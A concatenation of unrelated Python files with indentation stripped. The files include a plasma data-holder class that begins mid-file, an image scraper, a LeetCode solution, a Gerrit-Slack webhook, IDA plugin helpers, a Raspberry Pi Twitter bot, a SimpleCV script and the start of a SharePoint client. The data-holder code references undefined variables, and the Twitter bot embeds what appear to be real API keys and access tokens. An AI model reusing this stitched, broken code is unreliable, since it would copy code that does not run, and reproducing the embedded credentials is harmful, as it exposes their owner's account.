msg = "Inconsistent grps from self.ddata[%s]['refs']:\n"%k0
msg += " - grps = %s\n"%str(grps)
msg += " - self._dgroup['lkey'] = %s\n"%str(lg)
msg += " - self.dgroup.keys() = %s"%str(self.dgroup.keys())
raise Exception(msg)
self._ddata['dict'][k0]['group'] = grps
# --------------
# dref
for k0 in self._dref['lkey']:
ldata = [kk for kk in self._ddata['lkey']
if k0 in self._ddata['dict'][kk]['refs']]
self._dref['dict'][k0]['ldata'] = ldata
assert self._dref['dict'][k0]['group'] in self._dgroup['lkey']
# --------------
# dgroup
for gg in self._dgroup['lkey']:
vg = self._dgroup['dict'][gg]
lref = [rr for rr in self._dref['lkey']
if self._dref['dict'][rr]['group'] == gg]
ldata = [dd for dd in self._ddata['lkey']
if any([dd in self._dref['dict'][vref]['ldata']
for vref in lref])]
# assert vg['depend'] in lidindref
self._dgroup['dict'][gg]['lref'] = lref
self._dgroup['dict'][gg]['ldata'] = ldata
# --------------
# params
lparam = self._ddata['lparam']
for kk in self._ddata['lkey']:
for pp in self._ddata['dict'][kk].keys():
if pp not in self._reserved_all and pp not in lparam:
lparam.append(pp)
for kk in self._ddata['lkey']:
for pp in lparam:
if pp not in self._ddata['dict'][kk].keys():
self._ddata[kk][pp] = None
self._ddata['lparam'] = lparam
###########
# Get keys of dictionnaries
###########
@staticmethod
def _get_keys_dgroup():
lk = [('lkey', []), ('dict', {})]
return lk
@staticmethod
def _get_keys_dref():
lk = [('lkey', []), ('dict', {})]
return lk
@staticmethod
def _get_keys_ddata():
lk = [('lkey', []), ('dict', {}), ('lparam', [])]
return lk
###########
# _init
###########
def _init(self, dref=None, ddata=None, **kwargs):
kwdargs = dict(dref=dref, ddata=ddata, **kwargs)
largs = self._get_largs_dref()
kwddref = self._extract_kwdargs(kwdargs, largs)
self._set_dref(complement=False, **kwddref)
largs = self._get_largs_ddata()
kwddata = self._extract_kwdargs(kwdargs, largs)
self._set_ddata(**kwddata)
self._dstrip['strip'] = 0
###########
# set dictionaries
###########
def _set_dref(self, dref, complement=True):
self._checkformat_dref(dref)
if complement:
self._complement_dgrouprefdata()
def _set_ddata(self, ddata):
self._checkformat_ddata(ddata)
self._complement_dgrouprefdata()
# ---------------------
# Methods for adding ref / quantities
# ---------------------
def add_ref(self, key, data=None, group=None, **kwdargs):
""" Add a reference """
self._set_dref({key: dict(data=data, group=group, **kwdargs)})
def remove_ref(self, key):
""" Remove a reference (all data depending on it are removed too) """
assert key in self._dref['lkey']
lkdata = self._dref['dict'][key]['ldata']
del self._dref['dict'][key]
self._dref['lkey'].remove(key)
for kk in lkdata:
if self._ddata['dict'][kk]['refs'] == (key,):
del self._ddata['dict'][kk]
self._ddata['lkey'].remove(kk)
self._complement_dgrouprefdata()
def add_data(self, key, data=None, ref=None, **kwdargs):
""" Add a data (all associated ref must be added first)) """
self._set_ddata({key: dict(data=data, ref=ref, **kwdargs)})
def remove_data(self, key, propagate=True):
""" Remove a data
Any associated ref reated to this data only is removed too (useless)
"""
if key in self._dref.keys():
self.remove_ref(key)
else:
assert key in self._ddata['dict'].keys()
if propagate:
# Check if associated ref shall be removed too
lref = self._ddata['dict'][key]['refs']
for kref in lref:
# Remove if key was the only associated data
if self._dref['dict'][kref]['ldata'] == [key]:
self.remove_ref(kref)
del self._ddata['dict'][key]
self._ddata['lkey'].remove(key)
self._lkdata.remove(key)
self._complement_dgrouprefdata()
###########
# strip dictionaries
###########
def _strip_ddata(self, strip=0, verb=0):
pass
###########
# _strip and get/from dict
###########
@classmethod
def _strip_init(cls):
cls._dstrip['allowed'] = [0, 1]
nMax = max(cls._dstrip['allowed'])
doc = """
1: None
"""
doc = utils.ToFuObjectBase.strip.__doc__.format(doc, nMax)
cls.strip.__doc__ = doc
def strip(self, strip=0, verb=True):
# super()
super(DataHolder, self).strip(strip=strip, verb=verb)
def _strip(self, strip=0, verb=True):
self._strip_ddata(strip=strip, verb=verb)
def _to_dict(self):
dout = {'dgroup': {'dict': self._dgroup, 'lexcept': None},
'dref': {'dict': self._dref, 'lexcept': None},
'ddata': {'dict': self._ddata, 'lexcept': None}}
return dout
def _from_dict(self, fd):
self._dgroup.update(**fd['dgroup'])
self._dref.update(**fd['dref'])
self._ddata.update(**fd['ddata'])
self._complement_dgrouprefdata()
###########
# properties
###########
@property
def dconfig(self):
""" The dict of configs """
return self._dconfig
@property
def dgroup(self):
""" The dict of groups """
return self._dgroup['dict']
@property
def lgroup(self):
""" The dict of groups """
return self._dgroup['lkey']
@property
def dref(self):
""" the dict of references """
return self._dref['dict']
@property
def lref(self):
""" the dict of references """
return self._dref['lkey']
@property
def ddata(self):
""" the dict of data """
return self._ddata['dict']
@property
def ldata(self):
""" the dict of data """
return self._ddata['lkey']
@property
def lparam(self):
""" the dict of data """
return self._ddata['lparam']
# ---------------------
# Add / remove params
# ---------------------
# UP TO HERE
def get_param(self, param=None, returnas=np.ndarray):
# Check inputs and trivial cases
if param is None:
return
assert param in self._ddata['lparam']
assert returnas in [np.ndarray, dict, list]
# Get output
if returnas == dict:
out = {kk: self._ddata['dict'][kk][param]
for kk in self._ddata['lkey']}
else:
out = [self._ddata['dict'][kk][param]
for kk in self._ddata['lkey']]
if returnas == np.ndarray:
try:
out = np.asarray(out)
except Exception as err:
msg = "Could not convert %s to array !"
warnings.warn(msg)
return out
def set_param(self, param=None, values=None, ind=None, key=None):
# Check and format input
if param is None:
return
assert param in self._ddata['lparam']
# Update all keys with common value
ltypes = [str, int, np.int, float, np.float, tuple]
lc = [any([isinstance(values, tt) for tt in ltypes]),
isinstance(values, list), isinstance(values, np.ndarray)]
if not any(lc):
msg = "Accepted types for values include:\n"
msg += " - %s: common to all\n"%str(ltypes)
msg += " - list, np.ndarray: key by key"
raise Exception(msg)
if lc0:
key = self._ind_tofrom_key(ind=ind, key=key, out='key')
for kk in key:
self._ddata['dict'][kk][param] = values
# Update relevant keys with corresponding values
else:
key = self._ind_tofrom_key(ind=ind, key=key, out='key')
assert len(key) == len(values)
for kk in range(len(key)):
self._ddata['dict'][key[ii]][param] = values[ii]
def add_param(self, param, values=None):
assert isinstance(param, str)
assert param not in self._ddata['lparam']
self._ddata['lparam'].append(param)
self.set_param(param=param, values=values)
def remove_param(self, param=None):
# Check and format input
if param is None:
return
assert param in self._ddata['lparam']
self._ddata['lparam'].remove(param)
for kk in self._ddata['lkey']:
del self._ddata['dict'][kk][param]
# ---------------------
# Read-only for internal use
# ---------------------
def select(self, group=None, ref=None, log='all', return_key=True,
**kwdargs):
""" Return the indices / keys of data matching criteria
The selection is done comparing the value of all provided parameters
The result is a boolean indices array, optionally with the keys list
It can include:
- log = 'all': only the data matching all criteria
- log = 'any': the data matching any criterion
If log = 'raw', a dict of indices arrays is returned, showing the
details for each criterion
"""
# Format and check input
assert log in ['all', 'any', 'raw']
if log == 'raw':
assert not return_key
# Get list of relevant criteria
lk = ['group', 'ref'] + list(kwdargs.keys())
lcrit = [ss for ss in lk if ss is not None]
ncrit = len(lcrit)
# Prepare array of bool indices and populate
ind = np.ones((ncrit, len(self._ddata['lkey'])), dtype=bool)
for ii in range(ncrit):
critval = eval(lcrit[ii])
try:
par = self.get_param(lcrit[ii], returnas=np.ndarray)
ind[ii, :] = par == critval
except Exception as err:
ind[ii, :] = [self._ddata['dict'][kk][param] == critval
for kk in self.__lkata]
# Format output ind
if log == 'all':
ind = np.all(ind, axis=0)
elif log == 'any':
ind = np.any(ind, axis=0)
else:
ind = {lcrit[ii]: ind[ii, :] for ii in range(ncrit)}
# Also return the list of keys if required
if return_key:
if np.any(ind):
out = ind, lid[ind.nonzero()[0]]
else:
out = ind, np.array([], dtype=int)
else:
out = ind
return out
def _ind_tofrom_key(self, ind=None, key=None, returnas=int):
# Check / format input
assert returnas in [int, bool, 'key']
lc = [ind is not None, key is not None]
assert np.sum(lc) <= 1
# Initialize output
out = np.zeros((len(self._ddata['lkey']),), dtype=bool)
# Test
if lc[0]:
ind = np.atleast_1d(ind).ravel()
assert ind.dtype == np.int or ind.dtype == np.bool
out[ind] = True
if returnas in [int, 'key']:
out = out.nonzero()[0]
if returnas == 'key':
out = [self._ddata['lkey'][ii] for ii in out]
elif lc[1]:
if isinstance(key, str):
key = [key]
if returnas == 'key':
out = key
else:
for kk in key:
out[self._ddata['lkey'].index(kk)] = True
if returnas == int:
out = out.nonzero()[0]
else:
if returnas == bool:
out[:] = True
elif returnas == int:
out = np.arange(0, len(self._ddata['lkey']))
else:
out = self._ddata['lkey']
return out
# ---------------------
# Methods for showing data
# ---------------------
def get_summary(self, show=None, show_core=None,
sep=' ', line='-', just='l',
table_sep=None, verb=True, return_=False):
""" Summary description of the object content """
# # Make sure the data is accessible
# msg = "The data is not accessible because self.strip(2) was used !"
# assert self._dstrip['strip']<2, msg
# -----------------------
# Build for groups
col0 = ['group name', 'nb. ref', 'nb. data']
ar0 = [(k0,
len(self._dgroup['dict'][k0]['lref']),
len(self._dgroup['dict'][k0]['ldata']))
for k0 in self._dgroup['lkey']]
# -----------------------
# Build for refs
col1 = ['ref key', 'group', 'size', 'nb. data']
ar1 = [(k0,
self._dref['dict'][k0]['group'],
self._dref['dict'][k0]['size'],
len(self._dref['dict'][k0]['ldata']))
for k0, v0 in self._dref['lkey']]
# -----------------------
# Build for ddata
col2 = ['data key']
if show_core is None:
show_core = self._show_in_summary_core
if isinstance(show_core, str):
show_core = [show_core]
lkcore = ['shape', 'group', 'ref']
assert all([ss in self._lparams + lkcore for ss in show_core])
col2 += show_core
if show is None:
show = self._show_in_summary
if show == 'all':
col2 += self._lparams
else:
if isinstance(show, str):
show = [show]
assert all([ss in self._lparams for ss in show])
col2 += show
ar2 = []
for k0 in self._lkdata:
v0 = self._ddata[k0]
lu = [k0] + [str(v0[cc]) for cc in col2[1:]]
ar2.append(lu)
return self._get_summary(
[ar0, ar1, ar2], [col0, col1, col2],
sep=sep, line=line, table_sep=table_sep,
verb=verb, return_=return_)
# ---------------------
# Method for interpolating on ref
# ---------------------
def get_time_common(self, lkeys, choose=None):
""" Return the common time vector to several quantities
If they do not have a common time vector, a reference one is choosen
according to criterion choose
"""
# Check all data have time-dependency
dout = {kk: {'t': self.get_time(kk)} for kk in lkeys}
dtu = dict.fromkeys(set([vv['t'] for vv in dout.values()]))
for kt in dtu.keys():
dtu[kt] = {'ldata': [kk for kk in lkeys if dout[kk]['t'] == kt]}
if len(dtu) == 1:
tref = list(dtu.keys())[0]
else:
lt, lres = zip(*[(kt, np.mean(np.diff(self._ddata[kt]['data'])))
for kt in dtu.keys()])
if choose is None:
choose = 'min'
if choose == 'min':
tref = lt[np.argmin(lres)]
return dout, dtu, tref
@staticmethod
def _get_time_common_arrays(dins, choose=None):
dout = dict.fromkeys(dins.keys())
dtu = {}
for k, v in dins.items():
c0 = type(k) is str
c0 = c0 and all([ss in v.keys() for ss in ['val', 't']])
c0 = c0 and all([type(v[ss]) is np.ndarray for ss in ['val', 't']])
c0 = c0 and v['t'].size in v['val'].shape
if not c0:
msg = "dins must be a dict of the form (at least):\n"
msg += " dins[%s] = {'val': np.ndarray,\n"%str(k)
msg += " 't': np.ndarray}\n"
msg += "Provided: %s"%str(dins)
raise Exception(msg)
kt, already = id(v['t']), True
if kt not in dtu.keys():
lisclose = [kk for kk, vv in dtu.items()
if (vv['val'].shape == v['t'].shape
and np.allclose(vv['val'], v['t']))]
assert len(lisclose) <= 1
if len(lisclose) == 1:
kt = lisclose[0]
else:
already = False
dtu[kt] = {'val': np.atleast_1d(v['t']).ravel(),
'ldata': [k]}
if already:
dtu[kt]['ldata'].append(k)
assert dtu[kt]['val'].size == v['val'].shape[0]
dout[k] = {'val': v['val'], 't': kt}
if len(dtu) == 1:
tref = list(dtu.keys())[0]
else:
lt, lres = zip(*[(kt, np.mean(np.diff(dtu[kt]['val'])))
for kt in dtu.keys()])
if choose is None:
choose = 'min'
if choose == 'min':
tref = lt[np.argmin(lres)]
return dout, dtu, tref
def _interp_on_common_time(self, lkeys,
choose='min', interp_t=None, t=None,
fill_value=np.nan):
""" Return a dict of time-interpolated data """
dout, dtu, tref = self.get_time_common(lkeys)
if type(t) is np.ndarray:
tref = np.atleast_1d(t).ravel()
tr = tref
ltu = dtu.keys()
else:
if type(t) is str:
tref = t
tr = self._ddata[tref]['data']
ltu = set(dtu.keys())
if tref in dtu.keys():
ltu = ltu.difference([tref])
if interp_t is None:
interp_t = _INTERPT
# Interpolate
for tt in ltu:
for kk in dtu[tt]['ldata']:
dout[kk]['val'] = scpinterp.interp1d(self._ddata[tt]['data'],
self._ddata[kk]['data'],
kind=interp_t, axis=0,
bounds_error=False,
fill_value=fill_value)(tr)
if type(tref) is not np.ndarray and tref in dtu.keys():
for kk in dtu[tref]['ldata']:
dout[kk]['val'] = self._ddata[kk]['data']
return dout, tref
def _interp_on_common_time_arrays(self, dins,
choose='min', interp_t=None, t=None,
fill_value=np.nan):
""" Return a dict of time-interpolated data """
dout, dtu, tref = self._get_time_common_arrays(dins)
if type(t) is np.ndarray:
tref = np.atleast_1d(t).ravel()
tr = tref
ltu = dtu.keys()
else:
if type(t) is str:
assert t in dout.keys()
tref = dout[t]['t']
tr = dtu[tref]['val']
ltu = set(dtu.keys()).difference([tref])
if interp_t is None:
interp_t = _INTERPT
# Interpolate
for tt in ltu:
for kk in dtu[tt]['ldata']:
dout[kk]['val'] = scpinterp.interp1d(dtu[tt]['val'],
dout[kk]['val'],
kind=interp_t, axis=0,
bounds_error=False,
fill_value=fill_value)(tr)
return dout, tref
def interp_t(self, dkeys,
choose='min', interp_t=None, t=None,
fill_value=np.nan):
# Check inputs
assert type(dkeys) in [list, dict]
if type(dkeys) is list:
dkeys = {kk: {'val': kk} for kk in dkeys}
lc = [(type(kk) is str
and type(vv) is dict
and type(vv.get('val', None)) in [str, np.ndarray])
for kk, vv in dkeys.items()]
assert all(lc), str(dkeys)
# Separate by type
dk0 = dict([(kk, vv) for kk, vv in dkeys.items()
if type(vv['val']) is str])
dk1 = dict([(kk, vv) for kk, vv in dkeys.items()
if type(vv['val']) is np.ndarray])
assert len(dkeys) == len(dk0) + len(dk1), str(dk0) + '\n' + str(dk1)
if len(dk0) == len(dkeys):
lk = [v['val'] for v in dk0.values()]
dout, tref = self._interp_on_common_time(lk, choose=choose,
t=t, interp_t=interp_t,
fill_value=fill_value)
dout = {kk: {'val': dout[vv['val']]['val'],
't': dout[vv['val']]['t']}
for kk, vv in dk0.items()}
elif len(dk1) == len(dkeys):
dout, tref = self._interp_on_common_time_arrays(
dk1, choose=choose, t=t,
interp_t=interp_t, fill_value=fill_value)
else:
lk = [v['val'] for v in dk0.values()]
if type(t) is np.ndarray:
dout, tref = self._interp_on_common_time(
lk, choose=choose, t=t,
interp_t=interp_t, fill_value=fill_value)
dout1, _ = self._interp_on_common_time_arrays(
dk1, choose=choose, t=t,
interp_t=interp_t, fill_value=fill_value)
else:
dout0, dtu0, tref0 = self.get_time_common(lk,
choose=choose)
dout1, dtu1, tref1 = self._get_time_common_arrays(
dk1, choose=choose)
if type(t) is str:
lc = [t in dtu0.keys(), t in dout1.keys()]
if not any(lc):
msg = "if t is str, it must refer to a valid key:\n"
msg += " - %s\n"%str(dtu0.keys())
msg += " - %s\n"%str(dout1.keys())
msg += "Provided: %s"%t
raise Exception(msg)
if lc[0]:
t0, t1 = t, self._ddata[t]['data']
else:
t0, t1 = dtu1[dout1[t]['t']]['val'], t
tref = t
else:
if choose is None:
choose = 'min'
if choose == 'min':
t0 = self._ddata[tref0]['data']
t1 = dtu1[tref1]['val']
dt0 = np.mean(np.diff(t0))
dt1 = np.mean(np.diff(t1))
if dt0 < dt1:
t0, t1, tref = tref0, t0, tref0
else:
t0, t1, tref = t1, tref1, tref1
dout, tref = self._interp_on_common_time(
lk, choose=choose, t=t0,
interp_t=interp_t, fill_value=fill_value)
dout = {kk: {'val': dout[vv['val']]['val'],
't': dout[vv['val']]['t']}
for kk, vv in dk0.items()}
dout1, _ = self._interp_on_common_time_arrays(
dk1, choose=choose, t=t1,
interp_t=interp_t, fill_value=fill_value)
dout.update(dout1)
return dout, tref
def _get_indtmult(self, idquant=None, idref1d=None, idref2d=None):
# Get time vectors and bins
idtq = self._ddata[idquant]['depend'][0]
tq = self._ddata[idtq]['data']
tbinq = 0.5*(tq[1:]+tq[:-1])
if idref1d is not None:
idtr1 = self._ddata[idref1d]['depend'][0]
tr1 = self._ddata[idtr1]['data']
tbinr1 = 0.5*(tr1[1:]+tr1[:-1])
if idref2d is not None and idref2d != idref1d:
idtr2 = self._ddata[idref2d]['depend'][0]
tr2 = self._ddata[idtr2]['data']
tbinr2 = 0.5*(tr2[1:]+tr2[:-1])
# Get tbinall and tall
if idref1d is None:
tbinall = tbinq
tall = tq
else:
if idref2d is None:
tbinall = np.unique(np.r_[tbinq, tbinr1])
else:
tbinall = np.unique(np.r_[tbinq, tbinr1, tbinr2])
tall = np.r_[tbinall[0] - 0.5*(tbinall[1]-tbinall[0]),
0.5*(tbinall[1:]+tbinall[:-1]),
tbinall[-1] + 0.5*(tbinall[-1]-tbinall[-2])]
# Get indtqr1r2 (tall with respect to tq, tr1, tr2)
indtq, indtr1, indtr2 = None, None, None
indtq = np.digitize(tall, tbinq)
if idref1d is None:
assert np.all(indtq == np.arange(0, tall.size))
if idref1d is not None:
indtr1 = np.digitize(tall, tbinr1)
if idref2d is not None:
indtr2 = np.digitize(tall, tbinr2)
ntall = tall.size
return tall, tbinall, ntall, indtq, indtr1, indtr2
@staticmethod
def _get_indtu(t=None, tall=None, tbinall=None,
idref1d=None, idref2d=None,
indtr1=None, indtr2=None):
# Get indt (t with respect to tbinall)
indt, indtu = None, None
if t is not None:
indt = np.digitize(t, tbinall)
indtu = np.unique(indt)
# Update
tall = tall[indtu]
if idref1d is not None:
assert indtr1 is not None
indtr1 = indtr1[indtu]
if idref2d is not None:
assert indtr2 is not None
indtr2 = indtr2[indtu]
ntall = tall.size
return tall, ntall, indt, indtu, indtr1, indtr2
def get_tcommon(self, lq, prefer='finer'):
""" Check if common t, else choose according to prefer
By default, prefer the finer time resolution
"""
if type(lq) is str:
lq = [lq]
t = []
for qq in lq:
ltr = [kk for kk in self._ddata[qq]['depend']
if self._dindref[kk]['group'] == 'time']
assert len(ltr) <= 1
if len(ltr) > 0 and ltr[0] not in t:
t.append(ltr[0])
assert len(t) >= 1
if len(t) > 1:
dt = [np.nanmean(np.diff(self._ddata[tt]['data'])) for tt in t]
if prefer == 'finer':
ind = np.argmin(dt)
else:
ind = np.argmax(dt)
else:
ind = 0
return t[ind], t
def _get_tcom(self, idquant=None, idref1d=None,
idref2d=None, idq2dR=None):
if idquant is not None:
out = self._get_indtmult(idquant=idquant,
idref1d=idref1d, idref2d=idref2d)
else:
out = self._get_indtmult(idquant=idq2dR)
return out
# ---------------------
# Methods for plotting data
# ---------------------
def plot(self, lquant, X=None,
ref1d=None, ref2d=None,
remap=False, res=0.01, interp_space=None,
sharex=False, bck=True):
lDat = self.get_Data(lquant, X=X, remap=remap,
ref1d=ref1d, ref2d=ref2d,
res=res, interp_space=interp_space)
if type(lDat) is list:
kh = lDat[0].plot_combine(lDat[1:], sharex=sharex, bck=bck)
else:
kh = lDat.plot(bck=bck)
return kh
def plot_combine(self, lquant, lData=None, X=None,
ref1d=None, ref2d=None,
remap=False, res=0.01, interp_space=None,
sharex=False, bck=True):
""" plot combining several quantities from the Plasma2D itself and
optional extra list of Data instances """
lDat = self.get_Data(lquant, X=X, remap=remap,
ref1d=ref1d, ref2d=ref2d,
res=res, interp_space=interp_space)
if lData is not None:
if type(lDat) is list:
lData = lDat[1:] + lData
else:
lData = lDat[1:] + [lData]
kh = lDat[0].plot_combine(lData, sharex=sharex, bck=bck)
return kh
|
#coding=utf-8
import urllib.request
import re
from bs4 import BeautifulSoup
import os
from tkinter import *
#<span class="thispage" data-total-page="131">1</span>
def download():
url_head = url_text.get()
#https://movie.douban.com/celebrity/1022004/photos/
saveDir = "D:\\kk\\"
if not os.path.isdir(saveDir):
os.makedirs(saveDir)
y=1
if url_head.strip() == '':
url_head= "https://movie.douban.com/celebrity/1012533/photos/"
content=urllib.request.urlopen(url_head).read()
soup=BeautifulSoup(content, "html.parser")
span_all = soup.find_all("span",attrs={'class':'thispage'})
for spans in span_all:
len = int(spans.attrs['data-total-page'])
for y in range(1,len+1):
page=(y-1)*30
url = url_head+"?type=C&start=%s&sortby=like&size=a&subtype=a" %page
content=urllib.request.urlopen(url).read()
soup=BeautifulSoup(content, "html.parser")
img_all=soup.find_all("img",src=re.compile('.doubanio.com/view/photo'))
print("正下载第%s页" %y)
x=30*y
for img in img_all:
img_str=img["src"]
#print("img_str = %s" %img_str)
img_name="%s-%s.jpg" %(y,x)
path="D:\\kk\\"+img_name #保存图片路径
urllib.request.urlretrieve(img_str,path)
x += 1
y += 1
print("已下载%s张图片" %x*y)
def windowExit():
window.destroy()
sys.exit();
if __name__ == '__main__':
window = Tk()
window.geometry("300x300")
url_text = Entry()
url_text.pack()
Button(window,text="download",command=download).pack()
Button(window,text="exit", command=windowExit).pack()
window.mainloop()
|
# https://leetcode.com/problems/max-number-of-k-sum-pairs/
from typing import List
from collections import Counter
class Solution:
def maxOperations(self, nums: List[int], k: int) -> int:
count = 0
c = Counter(nums)
for i, freq in c.items():
counterpart = k - i
c_freq = c[counterpart]
count += min(freq, c_freq)
return count // 2
def main():
sol = Solution()
nums = [2,5,4,4,1,3,4,4,1,4,4,1,2,1,2,2,3,2,4,2]
k = 3
print(sol.maxOperations(nums, k))
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#
# Copyright (c) 2014, Aleksey Didik <aleksey.didik@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
Gerrit Slack Integration Webhook for change-merge
"""
__author__ = "Aleksey Didik"
__author_email__ = "aleksey.didik@gmail.com"
# Configuration section
# Gerrit parameters is necessary to retrive commit message and author
# Gerrit SSH port (default is 29418)
GERRIT_PORT = 29418
# Gerrit user@host
# Gerrit user what will be used to query gerrit for commit messages.
# Be sure you put ~/.ssh/id_rsa.pub to SSH Public Keys in this user Settings in Gerrit WebUI.
GERRIT_SERVER = "user@host"
# Webhook URL provided by Incoming Webhook integration of Slack
SLACK_WEBHOOK_URL = "https://<token>.slack.com/services/hooks/incoming-webhook?token=<token>"
# Mapping #channel to Gerrit projects.
# One channel can be mapped on several projects.
# Use regexp for
# E.g. to map all projects to general and #web channel
# to projects web-project and web-design set:
# {"gerrit": [".*"], "web": ["web-project", "web-design"]}
CHANNEL_MAPPING = {"#gerrit": [".*"]}
# emoji icon to be used in a message.
# set value "" to use Slack defined icon
ICON_EMOJI = ":white_check_mark:"
# End of coniguration section
import json
import time
import urllib
import urllib2
import subprocess
import re
from optparse import OptionParser
def getCommitInfo(commit_hash):
try:
result = json.loads(
subprocess.Popen(
["ssh", "-p", str(GERRIT_PORT), GERRIT_SERVER, "gerrit", "query", "--commit-message", "--format", "json", commit_hash],
stdout=subprocess.PIPE
).communicate()[0].splitlines()[0]
)
return (result["commitMessage"], result["owner"]["name"])
except Exception, e:
return ("Failed getting commit message, %s: %s" % (
e.__class__.__name__, e),
"unknown user")
def webhook(channel, project, branch, name, change_url, message, submitter):
data = {
"channel" : channel,
"pretext": "@{0} has merged change <{1}|{2}>".format(submitter, change_url, message.splitlines()[0]),
"color": "#00D000",
"fields": [
{
"title": "Author",
"value": name,
"short": "true"
},
{
"title": "Project",
"value": project,
},
{
"title": "Branch",
"value": branch,
},
],
"link_names": 1,
"fallback" : "@{0} has merged change {1}\n Author: {2}\n Project: {3}\n Branch: {4}\n Link: {5}"
.format(submitter, message, name, project, branch, change_url)
}
if ICON_EMOJI != "":
data["icon_emoji"] = ICON_EMOJI
urllib2.urlopen(SLACK_WEBHOOK_URL, urllib.urlencode({"payload": json.dumps(data)})).read()
def main():
parser = OptionParser(usage="usage: %prog <required options>")
parser.add_option("--change", help="Change identifier")
parser.add_option("--change-url", help="Change url")
parser.add_option("--project", help="Project path in Gerrit")
parser.add_option("--branch", help="Branch name")
parser.add_option("--topic", help="Topic name")
parser.add_option("--submitter", help="Submitter")
parser.add_option("--commit", help="Git commit hash")
options, args = parser.parse_args()
message, name = getCommitInfo(options.commit)
for channel in CHANNEL_MAPPING:
for project_re in CHANNEL_MAPPING[channel]:
if re.compile(project_re).match(options.project):
webhook(channel, options.project, options.branch, name, options.change_url, message, options.submitter)
if __name__ == "__main__":
main()
|
from ida_kernwin import *
from netnode import Netnode
class ActionHandler(action_handler_t):
def __init__(self, handler, disable = None, enable = None):
action_handler_t.__init__(self)
self.disable = disable
self.enable = enable
self.handler = handler
# Say hello when invoked.
def activate(self, ctx):
return self.handler(ctx)
# This action is always available.
def update(self, ctx):
if self.enable:
if type(self.enable) is int:
return self.enable
return AST_ENABLE if self.enable() else AST_DISABLE
if self.disable:
return AST_DISABLE if self.disable() else AST_ENABLE
return AST_ENABLE_ALWAYS
def add_menu_item(menu_path, label, action_name, handler, shortcut = '', tooltip = ''):
# Register the action
r = register_action(action_desc_t(
action_name, # The action name. This acts like an ID and must be unique
label, # The action text.
handler, # The action handler
shortcut, # Optional: the action shortcut
tooltip, # Optional: the action tooltip (available in menus/toolbar)
# Optional: the action icon (shows when in menus/toolbars) use numbers 1-255
))
return attach_action_to_menu(menu_path, action_name, SETMENU_APP)
def idb_get(key, val = None):
return Netnode('WormTools').get(key, val)
def idb_set(key, val):
Netnode('WormTools')[key] = val |
from threading import Thread, Event
import datetime
import RPi.GPIO as GPIO
import time
import sys
import tweepy, time
auth = tweepy.OAuthHandler('6jj33wAEIhdQGLazNeWunjez8', 'dgNUJbzBEVfhr8ShGPeJRK4ecNlKXRKLtzx48y2agjynrBealh')
auth.set_access_token('166842701-iV01OtWPDkjQybnZuEIf1GWp0vc5fI71lz7LOfB2', 'FC7DpSxVuU7uKN2E0BE8G0rrz4h4I6NtDanxI3VOMLHas')
api = tweepy.API(auth)
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(8, GPIO.IN,
pull_up_down=GPIO.PUD_UP)
GPIO.setup(10, GPIO.IN,
pull_up_down=GPIO.PUD_UP)
event = Event()
counter1 = 0
counter2 = 0
def route1():
global counter1
current = True
old = True
while True:
if event.is_set():
return
current = GPIO.input(8)
if current == True and old == False:
counter1 += 1
print ("Counter 1: {}".format(counter1))
old = current
if counter1 == 20:
event.set()
return
#time.sleep(.005)
def route2():
global counter2
current = True
old = True
while True:
if event.is_set():
return
current = GPIO.input(10)
if current == True and old == False:
counter2 += 1
print ("Counter 2: {}".format(counter2))
old = current
if counter2 == 3:
event.set()
return
#time.sleep(.005)
def main():
while True:
run()
def run():
global counter1
global counter2
t1 = Thread(target=route1)
t2 = Thread(target=route2)
t1.start()
t2.start()
event.wait()
print("Route 1: {}, Route 2: {}".format(counter1, counter2))
if counter1 > counter2:
tweet = ("Take Route 885")
elif counter2 > counter1:
tweet = ("Take Streets Run Road")
else:
tweet = ("Both routes the same")
now = str(datetime.datetime.now())
tweet = now+" "+tweet
print(tweet)
print("tweeting")
api.update_status(tweet.strip())
time.sleep(1)
event.clear()
if __name__ == "__main__":
main()
|
from SimpleCV import *
#import Image, Color, time
disp = Display()
img = Image("images/egg.jpg")
#img2 = img.colorDistance((71,57,45))
img5 = img.toGray()
img2 = img5.binarize()
img3 = img2.findBlobs()
#img4 = img3.resize(500,500)
#img4 = img3.scale(500,500)
print("Image in binary: ", img2)
print("Area: ", img3.area())
print("Angle: ", img3.angle())
print("Coordinate: ", img3.coordinates())
for x in img3:
print("Saving ", x)
x.save("picture",x,".jpg")
#x.show()
#time.sleep(1)
#img3.show(width=1)
#img3.save(disp)
#time.sleep(10)
#img = img.drawText("Hello World!")
#while True:
#img2 = img.toGray()
#img3 = img2.binarize()
#img4 = img2.edges()
#img5 = img.findBlobs()
#for blob in blobs:
# blob.draw()
# if img.mouseLeft:
# break
#img = img.resize(500,500)
#img.show()
#img.save(disp)
#time.sleep(5)
#cam = camera(0, { "width": 640, "height": 480 })
#img2 = cam.getImage()
#img2.save(disp)
#img2 = img2.resize(500,500)
#img2.show()
#time.sleep(5)
#img5.show()
#img5.save(disp)
|
# -*- coding: utf-8 -*-
""" e-coucou 2015 """
import requests, lxml, json, urllib, sys, argparse, getpass, time
from lxml import html,etree
from requests_ntlm import HttpNtlmAuth
DEBUG = 0
OUTSIDE = 0
level = 0
g_cnt = 0
g_file = 0
g_size = 0
flog=open('sharepoint.log','w')
#----------------
def aff(str,val):
print '- >>',str,val
return
def reponse(rep,code):
print '#',code,'########################################################'
print 'cde : ----'
print rep.request.url
for hh in rep.request.headers:
print hh,'=',rep.request.headers[hh]
print 'rep : ----'
print rep.history
if rep.history:
for rp in rep.history:
print rp.status_code, rp.url
print '/'
